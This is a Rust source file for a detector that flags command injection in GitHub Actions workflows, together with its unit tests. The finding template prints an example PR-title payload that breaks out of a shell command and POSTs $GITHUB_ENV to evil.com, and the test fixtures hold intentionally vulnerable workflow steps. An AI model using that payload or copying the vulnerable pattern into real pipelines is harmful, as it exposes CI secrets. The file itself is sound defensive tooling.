// repotoire 0.9.0

//! GitHub Actions Command Injection detector
//!
//! Scans workflow files for dangerous patterns where user-controlled input
//! flows into `run:` blocks. This is a CRITICAL security vulnerability.
//!
//! CWE-78: Improper Neutralization of Special Elements used in an OS Command
//!
//! ## Blocking-tier logic (Task 11c)
//!
//! A finding is promoted to `Tier::Blocking` + `Evidence::ConfigFact { rule:
//! "gha_untrusted_input_to_run" }` **only** when:
//!
//! - The file is a `.github/workflows/` YAML (not a test-fixture path).
//! - A step's `run:` block contains a *direct* `${{ <untrusted> }}` interpolation
//!   (not via an `env:` indirection — env: lines are structurally outside run:
//!   blocks, so the scanner's state machine handles this automatically).
//! - The line is not a YAML comment.
//! - "Untrusted" is the canonical set from GitHub's security guide:
//!   `github.event.issue.{body,title}`, `github.event.pull_request.{body,title}`,
//!   `github.event.pull_request.head.{ref,label,repo.default_branch}`,
//!   `github.head_ref`, `github.event.comment.body`, `github.event.review.body`,
//!   `github.event.discussion.{body,title}`.

use crate::detectors::base::{is_test_file, Detector, DetectorConfig};
use crate::models::{Evidence, Finding, Severity, SourceSpan, Tier};
use anyhow::Result;
use regex::Regex;
use std::path::{Path, PathBuf};
use std::sync::LazyLock;
use tracing::{debug, info};

/// GitHub Actions injection detector.
///
/// Scans `.github/workflows/` YAML files for user-controlled `${{ … }}`
/// expressions that are interpolated into `run:` steps.
pub struct GHActionsInjectionDetector {
    /// Detector configuration, exposed through `Detector::config`.
    config: DetectorConfig,
    /// Upper bound on the number of findings returned by a single `detect` call.
    max_findings: usize,
}

// ---------------------------------------------------------------------------
// Regex constants
// ---------------------------------------------------------------------------

/// Regex for the canonical untrusted-input set that triggers `Tier::Blocking`.
///
/// Matches a complete `${{ <context> }}` expression (whitespace inside the
/// braces is optional); capture group 1 holds the context path.
static BLOCKING_UNTRUSTED_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    // Regex fragments, one per untrusted context; OR-ed together below.
    let contexts: &[&str] = &[
        r"github\.event\.issue\.body",
        r"github\.event\.issue\.title",
        r"github\.event\.pull_request\.body",
        r"github\.event\.pull_request\.title",
        r"github\.event\.pull_request\.head\.ref",
        r"github\.event\.pull_request\.head\.label",
        r"github\.event\.pull_request\.head\.repo\.default_branch",
        r"github\.head_ref",
        r"github\.event\.comment\.body",
        r"github\.event\.review\.body",
        r"github\.event\.discussion\.body",
        r"github\.event\.discussion\.title",
    ];
    let alternation = contexts.join("|");
    // `{{` / `}}` are `format!` escapes for literal braces, so the result is
    // `\$\{\{\s*(<alternation>)\s*\}\}`.
    let source = format!(r"\$\{{\{{\s*({})\s*\}}\}}", alternation);
    Regex::new(&source).expect("valid BLOCKING_UNTRUSTED_PATTERN regex")
});

/// Regex for the broader advisory set of user-controllable contexts.
///
/// Contains every context of the blocking set plus commit messages and author
/// fields, review-comment bodies, `github.event.inputs.*`, and the sender login.
/// Matches a complete `${{ <context> }}` expression; capture group 1 holds the
/// context path.
static DANGEROUS_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    // Regex fragments, one per context; OR-ed together below.
    let contexts: &[&str] = &[
        r"github\.event\.pull_request\.title",
        r"github\.event\.pull_request\.body",
        r"github\.event\.pull_request\.head\.ref",
        r"github\.event\.pull_request\.head\.label",
        r"github\.event\.pull_request\.head\.repo\.default_branch",
        r"github\.head_ref",
        r"github\.event\.issue\.title",
        r"github\.event\.issue\.body",
        r"github\.event\.comment\.body",
        r"github\.event\.review\.body",
        r"github\.event\.review_comment\.body",
        r"github\.event\.discussion\.title",
        r"github\.event\.discussion\.body",
        r"github\.event\.commits\[\d*\]\.message",
        r"github\.event\.head_commit\.message",
        r"github\.event\.head_commit\.author\.name",
        r"github\.event\.head_commit\.author\.email",
        r"github\.event\.inputs\.[^}]+",
        r"github\.event\.sender\.login",
    ];
    let alternation = contexts.join("|");
    // `{{` / `}}` are `format!` escapes for literal braces, so the result is
    // `\$\{\{\s*(<alternation>)\s*\}\}`.
    let source = format!(r"\$\{{\{{\s*({})\s*\}}\}}", alternation);
    Regex::new(&source).expect("valid regex")
});

/// Matches a line that opens a `run:` value: optional indentation, an optional
/// `- ` sequence marker, the `run:` key, and an optional `|` / `>` block-scalar
/// indicator.
static RUN_BLOCK_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
    let source = r"^\s*(?:-\s+)?run:\s*[|>]?\s*";
    Regex::new(source).expect("valid regex")
});

// ---------------------------------------------------------------------------
// Core scanning
// ---------------------------------------------------------------------------

impl GHActionsInjectionDetector {
    /// Build a detector with the default `DetectorConfig` and a cap of 50 findings.
    ///
    /// `_repository_path` is currently unused: it is neither stored nor read.
    pub fn new(_repository_path: impl Into<PathBuf>) -> Self {
        let config = DetectorConfig::default();
        let max_findings = 50;
        Self {
            config,
            max_findings,
        }
    }

    /// Set maximum findings
    #[allow(dead_code)] // Builder method
    pub fn with_max_findings(mut self, max: usize) -> Self {
        self.max_findings = max;
        self
    }

    /// Scan a workflow file for untrusted `${{ … }}` interpolations inside `run:` values.
    ///
    /// The file is walked line by line with a small state machine that tracks
    /// whether the current line belongs to a `run:` value — either the inline
    /// command on the `run:` line itself or the more-indented lines that follow
    /// it. Lines in that state are tested against `DANGEROUS_PATTERN`; at most one
    /// match (the first on the line) is recorded per line.
    ///
    /// # Arguments
    ///
    /// * `file_path` - path of the workflow file; recorded (lossily converted to a
    ///   string) in every match and passed to `is_test_file` to decide whether
    ///   matches may be blocking.
    /// * `content` - full text of the workflow file.
    ///
    /// # Returns
    ///
    /// One `InjectionMatch` per offending line, in file order. `is_blocking` is set
    /// when the line also matches `BLOCKING_UNTRUSTED_PATTERN` and `file_path` is
    /// not a test file. Lines for which `crate::detectors::is_line_suppressed`
    /// returns true are omitted.
    fn scan_workflow_file(&self, file_path: &Path, content: &str) -> Vec<InjectionMatch> {
        let rel_path = file_path.to_string_lossy().to_string();
        let is_fixture = is_test_file(file_path);

        let dangerous = &*DANGEROUS_PATTERN;
        let blocking_untrusted = &*BLOCKING_UNTRUSTED_PATTERN;
        let run_block = &*RUN_BLOCK_PATTERN;

        let lines: Vec<&str> = content.lines().collect();
        let mut matches = Vec::new();

        // Column of the `run` key whose value is currently being scanned, or
        // `None` while outside any `run:` value.
        let mut run_key_column: Option<usize> = None;

        for (idx, line) in lines.iter().copied().enumerate() {
            let stripped = line.trim_start();
            let current_indent = line.len() - stripped.len();

            // Skip comment lines — `# run: ${{ … }}` must not fire.
            // NOTE(review): this also skips `#` shell comments inside a block
            // scalar, where GitHub still expands `${{ … }}` before the shell
            // runs — confirm that ignoring those is intended.
            if stripped.starts_with('#') {
                continue;
            }

            if run_block.is_match(line) {
                // The pattern only admits whitespace and an optional `- ` before
                // the key, so the first `run:` on the line is the key itself.
                // Measuring from the key (not from the dash) makes sibling keys
                // of a `- run:` step, such as a following `env:`, end the value.
                run_key_column = Some(line.find("run:").unwrap_or(current_indent));
            } else {
                let Some(key_column) = run_key_column else {
                    // Not inside a `run:` value: nothing to inspect.
                    continue;
                };
                // Blank lines neither end the value nor carry an expression.
                if stripped.is_empty() {
                    continue;
                }
                // A scalar's continuation lines must be indented deeper than its
                // key. Anything at or left of the key column — a sibling key or
                // the next `- step` — ends the value.
                if current_indent <= key_column {
                    run_key_column = None;
                    continue;
                }
            }

            // Reached for the `run:` line itself (inline command) and for every
            // continuation line of the value.
            let Some(caps) = dangerous.captures(line) else {
                continue;
            };
            let prev_line = idx.checked_sub(1).map(|prev| lines[prev]);
            if crate::detectors::is_line_suppressed(line, prev_line) {
                continue;
            }

            matches.push(InjectionMatch {
                file: rel_path.clone(),
                // 1-based line number; the cast could only truncate for a file
                // with more than `u32::MAX` lines.
                line: (idx + 1) as u32,
                content: line.trim().to_string(),
                // Capture group 1 is the matched context path.
                pattern: caps
                    .get(1)
                    .map(|m| m.as_str().to_string())
                    .unwrap_or_default(),
                is_blocking: !is_fixture && blocking_untrusted.is_match(line),
            });
        }

        matches
    }

    /// Turn one `InjectionMatch` into a fully populated `Finding`.
    ///
    /// The title names the kind of input (pull request, issue, comment, commit,
    /// workflow input, or generic user input) inferred from the matched context
    /// path. Blocking matches get `Tier::Blocking`, `Evidence::ConfigFact` with the
    /// `gha_untrusted_input_to_run` rule, `deterministic = true`, and confidence
    /// 1.0; all other matches get `Tier::Advisory`, no evidence, and confidence 0.85.
    ///
    /// `file_path` is used for the evidence span, while `affected_files` is built
    /// from the path string stored in the match.
    fn create_finding(&self, m: &InjectionMatch, file_path: &Path) -> Finding {
        // Ordered (needle, label) pairs: the first needle found in the lowercased
        // context path decides the label.
        const SOURCE_LABELS: [(&str, &str); 7] = [
            ("pull_request", "Pull Request"),
            ("head_ref", "Pull Request"),
            ("issue", "Issue"),
            ("comment", "Comment"),
            ("review", "Comment"),
            ("commit", "Commit"),
            ("inputs", "Workflow Input"),
        ];

        let lowered = m.pattern.to_lowercase();
        let source_type = SOURCE_LABELS
            .iter()
            .find(|(needle, _)| lowered.contains(*needle))
            .map(|(_, label)| *label)
            .unwrap_or("User Input");

        let title = format!("GitHub Actions Command Injection ({})", source_type);

        let description = format!(
            r#"**Critical: Command Injection in GitHub Actions Workflow**

**File**: `{}`
**Line**: {}

**Vulnerable pattern detected**: `${{{{ {} }}}}`

**Code**:
```yaml
{}
```

This workflow interpolates user-controlled input directly into a shell command.
An attacker can exploit this to execute arbitrary commands in your CI environment.

**Attack vector**:
- For PRs: Attacker opens a PR with a malicious title/branch name
- For issues: Attacker creates an issue with a malicious title/body
- For comments: Attacker posts a comment with shell injection payload

**Example attack payload** (in PR title):
```
"; curl -X POST -d @$GITHUB_ENV http://evil.com; #
```

This can lead to:
- **Secrets exfiltration**: GITHUB_TOKEN, AWS keys, API tokens
- **Supply chain attacks**: Malicious code pushed to main branch
- **Lateral movement**: Access to other repositories via GITHUB_TOKEN
- **Complete repository compromise**"#,
            m.file, m.line, m.pattern, m.content
        );

        let recommendation = format!(
            r#"**Recommended fixes**:

1. **Use an intermediate environment variable** (preferred):
   ```yaml
   - name: Safe handling
     env:
       TITLE: ${{{{ {} }}}}
     run: |
       echo "Title: $TITLE"
   ```

2. **Use GitHub Script action** (for complex logic):
   ```yaml
   - uses: actions/github-script@v7
     with:
       script: |
         const title = context.payload.pull_request.title;
         // Process safely in JavaScript
   ```

**References**:
- https://securitylab.github.com/research/github-actions-untrusted-input/
- https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions"#,
            m.pattern
        );

        // Everything tier-related hinges on the single `is_blocking` flag.
        let blocking = m.is_blocking;
        let tier = if blocking {
            Tier::Blocking
        } else {
            Tier::Advisory
        };
        // Only blocking findings carry structured evidence.
        let evidence = blocking.then(|| Evidence::ConfigFact {
            span: SourceSpan {
                file: file_path.to_path_buf(),
                line_start: m.line,
                line_end: m.line,
                snippet: Some(m.content.clone()),
            },
            rule: "gha_untrusted_input_to_run".to_string(),
        });
        let confidence = Some(if blocking { 1.0_f64 } else { 0.85_f64 });

        Finding {
            id: String::new(),
            detector: "GHActionsInjectionDetector".to_string(),
            severity: Severity::Critical,
            title,
            description,
            affected_files: vec![PathBuf::from(&m.file)],
            line_start: Some(m.line),
            line_end: Some(m.line),
            suggested_fix: Some(recommendation),
            estimated_effort: Some("Low (15-30 minutes)".to_string()),
            category: Some("command_injection".to_string()),
            cwe_id: Some("CWE-78".to_string()),
            why_it_matters: Some(
                "Command injection in CI/CD pipelines can lead to complete repository compromise, \
                 secrets theft, and supply chain attacks affecting all users of your software."
                    .to_string(),
            ),
            tier,
            evidence,
            deterministic: blocking,
            confidence,
            ..Default::default()
        }
    }
}

/// Injection match result: one workflow line on which a dangerous `${{ … }}`
/// expression was found.
struct InjectionMatch {
    /// Path of the scanned workflow file, lossily converted to a string.
    file: String,
    /// 1-based line number of the offending line.
    line: u32,
    /// The offending line with surrounding whitespace trimmed.
    content: String,
    /// The context path captured from the expression (capture group 1 of the
    /// dangerous-pattern regex), e.g. `github.event.issue.body`.
    pattern: String,
    /// True when this match qualifies for `Tier::Blocking`.
    is_blocking: bool,
}

impl Detector for GHActionsInjectionDetector {
    fn name(&self) -> &'static str {
        "GHActionsInjectionDetector"
    }

    fn description(&self) -> &'static str {
        "Detects command injection vulnerabilities in GitHub Actions workflows"
    }

    fn bypass_postprocessor(&self) -> bool {
        true
    }

    fn requires_graph(&self) -> bool {
        false
    }

    fn file_extensions(&self) -> &'static [&'static str] {
        &["yml", "yaml"]
    }

    fn detect(
        &self,
        ctx: &crate::detectors::analysis_context::AnalysisContext,
    ) -> Result<Vec<Finding>> {
        let fp = ctx.as_file_provider();

        let yaml_files = fp.files_with_extensions(&["yml", "yaml"]);
        let workflow_files: Vec<&Path> = yaml_files
            .into_iter()
            .filter(|p| p.to_string_lossy().contains(".github/workflows/"))
            .collect();

        if workflow_files.is_empty() {
            debug!("No .github/workflows YAML files found");
            return Ok(Vec::new());
        }

        info!(
            "Scanning {} GitHub Actions workflow files",
            workflow_files.len()
        );

        let mut all_matches: Vec<(InjectionMatch, PathBuf)> = Vec::new();

        for path in workflow_files {
            let content = match fp.content(path) {
                Some(c) => c,
                None => continue,
            };

            for m in self.scan_workflow_file(path, &content) {
                all_matches.push((m, path.to_path_buf()));
            }

            if all_matches.len() >= self.max_findings {
                break;
            }
        }

        let findings: Vec<Finding> = all_matches
            .iter()
            .take(self.max_findings)
            .map(|(m, path)| self.create_finding(m, path))
            .collect();

        info!(
            "GHActionsInjectionDetector found {} potential vulnerabilities",
            findings.len()
        );

        Ok(findings)
    }

    fn category(&self) -> &'static str {
        "security"
    }

    fn config(&self) -> Option<&DetectorConfig> {
        Some(&self.config)
    }
}

impl crate::detectors::RegisteredDetector for GHActionsInjectionDetector {
    fn create(init: &crate::detectors::DetectorInit) -> std::sync::Arc<dyn Detector> {
        std::sync::Arc::new(Self::new(init.repo_path))
    }

    fn max_tier() -> crate::models::Tier {
        crate::models::Tier::Blocking
    }
}

// ---------------------------------------------------------------------------
// Tests
// ---------------------------------------------------------------------------

#[cfg(test)]
mod tests {
    use super::*;
    use crate::models::{Evidence, Tier};

    // -----------------------------------------------------------------------
    // Task 11c — blocking-tier tests (required by plan)
    // -----------------------------------------------------------------------

    /// Helper: scan a single workflow file content and return all findings.
    ///
    /// Calls `scan_workflow_file` directly, so the `.github/workflows/` path
    /// filter applied by `detect` is not exercised here.
    fn scan(path: &str, content: &str) -> Vec<Finding> {
        let detector = GHActionsInjectionDetector::new(Path::new("."));
        let file_path = Path::new(path);
        detector
            .scan_workflow_file(file_path, content)
            .into_iter()
            .map(|m| detector.create_finding(&m, file_path))
            .collect()
    }

    /// Inline `run:` with a canonical untrusted context yields a Blocking
    /// finding carrying `ConfigFact` evidence, determinism, and confidence 1.0.
    #[test]
    fn exact_antipattern_is_blocking() {
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.event.issue.body }}"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        assert!(!findings.is_empty(), "should have at least one finding");
        let f = findings
            .iter()
            .find(|f| f.tier == Tier::Blocking)
            .expect("at least one Blocking finding");

        assert_eq!(f.tier, Tier::Blocking);
        match &f.evidence {
            Some(Evidence::ConfigFact { rule, .. }) => {
                assert_eq!(rule, "gha_untrusted_input_to_run");
            }
            other => panic!("expected ConfigFact evidence, got {:?}", other),
        }
        assert!(f.deterministic, "blocking finding must be deterministic");
        assert_eq!(
            f.confidence.unwrap(),
            1.0,
            "blocking finding confidence must be 1.0"
        );
    }

    #[test]
    fn env_indirection_is_advisory_or_absent() {
        // The untrusted value is safely routed through env: — run: uses $BODY (shell var).
        // env: lines are outside the run: block in the YAML structure, so the scanner's
        // state machine never marks them as inside a run: block.
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - name: safe
        env:
          BODY: "${{ github.event.issue.body }}"
        run: |
          echo "$BODY"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        for f in &findings {
            assert_ne!(
                f.tier,
                Tier::Blocking,
                "env-indirection must not produce a Blocking finding; got {:?}",
                f
            );
        }
    }

    /// Contexts outside the dangerous set must not produce any finding at all.
    #[test]
    fn safe_context_is_not_flagged() {
        let content = r#"
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.sha }}"
      - run: echo "${{ inputs.name }}"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        // Asserting emptiness (rather than looping over findings) keeps the
        // test from passing vacuously and matches the test's name.
        assert!(
            findings.is_empty(),
            "safe contexts must not be flagged; got {:?}",
            findings
        );
    }

    /// A dangerous expression that only appears in a YAML comment is ignored.
    #[test]
    fn commented_out_is_not_flagged() {
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      # run: echo "${{ github.event.issue.body }}"
      - run: echo "hello"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        assert!(
            findings.is_empty(),
            "commented-out line must not produce a finding; got {:?}",
            findings
        );
    }

    /// In a test-fixture path the antipattern is still reported, but only as Advisory.
    #[test]
    fn in_test_fixture_is_advisory() {
        let content = r#"
on: [issues]
jobs:
  echo:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ github.event.issue.body }}"
"#;
        let findings = scan("tests/fixtures/wf.yml", content);
        // Without this check the loop below would pass on an empty result.
        assert!(
            !findings.is_empty(),
            "fixture path should still produce an advisory finding"
        );
        for f in &findings {
            assert_eq!(
                f.tier,
                Tier::Advisory,
                "test-fixture path must not produce a Blocking finding"
            );
            assert!(
                f.evidence.is_none(),
                "advisory finding must not carry blocking evidence"
            );
        }
    }

    // -----------------------------------------------------------------------
    // Legacy tests (kept from original implementation)
    // -----------------------------------------------------------------------

    #[test]
    fn test_dangerous_pattern() {
        let pattern = &*DANGEROUS_PATTERN;

        assert!(pattern.is_match("echo ${{ github.event.pull_request.title }}"));
        assert!(pattern.is_match("${{ github.head_ref }}"));
        assert!(pattern.is_match("${{ github.event.issue.body }}"));
        assert!(pattern.is_match("${{ github.event.comment.body }}"));

        assert!(!pattern.is_match("${{ github.sha }}"));
        assert!(!pattern.is_match("${{ github.repository }}"));
        assert!(!pattern.is_match("${{ secrets.GITHUB_TOKEN }}"));
    }

    #[test]
    fn test_run_block_pattern() {
        let pattern = &*RUN_BLOCK_PATTERN;

        assert!(pattern.is_match("run: echo hello"));
        assert!(pattern.is_match("  run: |"));
        assert!(pattern.is_match("    - run: >"));
        assert!(!pattern.is_match("name: Run tests"));
    }

    #[test]
    fn blocking_untrusted_pattern_matches_canonical_set() {
        let p = &*BLOCKING_UNTRUSTED_PATTERN;
        assert!(p.is_match("${{ github.event.issue.body }}"));
        assert!(p.is_match("${{ github.event.issue.title }}"));
        assert!(p.is_match("${{ github.event.pull_request.body }}"));
        assert!(p.is_match("${{ github.event.pull_request.title }}"));
        assert!(p.is_match("${{ github.event.pull_request.head.ref }}"));
        assert!(p.is_match("${{ github.event.pull_request.head.label }}"));
        assert!(p.is_match("${{ github.head_ref }}"));
        assert!(p.is_match("${{ github.event.comment.body }}"));
        assert!(p.is_match("${{ github.event.review.body }}"));
        assert!(p.is_match("${{ github.event.discussion.body }}"));
        assert!(p.is_match("${{ github.event.discussion.title }}"));
        assert!(!p.is_match("${{ github.sha }}"));
        assert!(!p.is_match("${{ github.repository }}"));
        assert!(!p.is_match("${{ secrets.GITHUB_TOKEN }}"));
        assert!(!p.is_match("${{ inputs.name }}"));
        assert!(!p.is_match("${{ github.event.sender.login }}"));
    }

    #[test]
    fn additional_untrusted_inputs_are_blocking() {
        let content = r#"
on: [pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - run: git checkout "${{ github.event.pull_request.head.ref }}"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        let blocking = findings.iter().filter(|f| f.tier == Tier::Blocking).count();
        assert!(blocking > 0, "head.ref should produce a Blocking finding");
    }

    #[test]
    fn multiline_run_block_is_blocking() {
        let content = r#"
on: [issues]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "start"
          echo "${{ github.event.issue.title }}"
          echo "end"
"#;
        let findings = scan(".github/workflows/ci.yml", content);
        let blocking: Vec<_> = findings
            .iter()
            .filter(|f| f.tier == Tier::Blocking)
            .collect();
        assert!(
            !blocking.is_empty(),
            "untrusted input in multiline run block should be Blocking"
        );
        match &blocking[0].evidence {
            Some(Evidence::ConfigFact { rule, .. }) => {
                assert_eq!(rule, "gha_untrusted_input_to_run");
            }
            other => panic!("expected ConfigFact, got {:?}", other),
        }
        // The raw string starts with a newline, so the interpolation sits on
        // line 9; the finding must point at that line, not at the `run:` line.
        assert_eq!(blocking[0].line_start, Some(9));
    }
}